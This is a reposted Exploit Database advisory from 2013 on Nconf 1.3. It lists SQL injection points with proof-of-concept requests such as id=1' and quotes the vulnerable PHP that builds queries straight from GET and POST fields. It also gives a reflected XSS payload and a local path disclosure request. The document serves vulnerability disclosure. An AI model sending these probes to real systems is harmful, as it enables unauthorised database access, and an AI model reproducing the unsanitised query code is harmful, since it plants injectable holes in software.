Nconf 1.3 – Multiple SQL Injections

• Exploit Database
• 9 阅读

• 作者： Saadi Siddiqui
  日期： 2013-03-04
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/24564/

• # Exploit Title:nconfhandle_item.php，Modify_attr.php etc Multiple Sql injection
  # Date: 2013/3/4
  # Exploit Author: Saadat Ullah，saadi_linux@rocketmail.com
  # Software Link:http://sourceforge.net/projects/nconf/files/nconf/
  # Vendors:	http://www.nconf.org/
  # Author HomePage: http://security-geeks.blogspot.com/
  # Version:nconf 1.3
  # Tested on: Server: Apache/2.2.15 (Centos)PHP/5.3.3
  
  Nconf Is vulnerable to Sql injection in most of the files , they did'nt sanitize any GET POST FILEDs.
  Some OF them Are
  
  Blind Sqli In handle_item.php on Id parameter
  handle_item.php?id=1'
  P0c
  $query2 .= ' AND id_item <> '.$_GET["id"];
  
  
  delete_attr.php
  POST DATA : id=15'&name=&delete=yes&submit=Delete
  Poc
  Id Via GEt FIELD
  $query = 'SELECT attr_name, config_class FROM ConfigAttrs, ConfigClasses WHERE id_attr='.$_GET["id"].' AND fk_id_class=ConfigClasses.id_class';
  And id via Post Field
  $query = 'DELETE FROM ConfigAttrs
  WHERE id_attr='.$_POST["id"];
  
  clone_host_write2db.php
  Again On id paramerter.
  Their are Many more...
  
  A Simple Reflected XSS 
  http://localhost/nconf/handle_item.php?item=<script>alert('Hi');</script>
  Poc
  $item_class = $_GET["item"];
  .
  .
  echo without Sanitization
  echo '<h2>'.ucfirst($handle_action).' '.$item_class.'</h2>';
  
  A LocalPath Disclose
  http://localhost/nconf/call_file.php?ajax_file=service_list.php&debug=yes
  Post Data:
  host_id=5372&highlight_service=5373&class=a
  
  
  #Independent Pakistani Security Researcher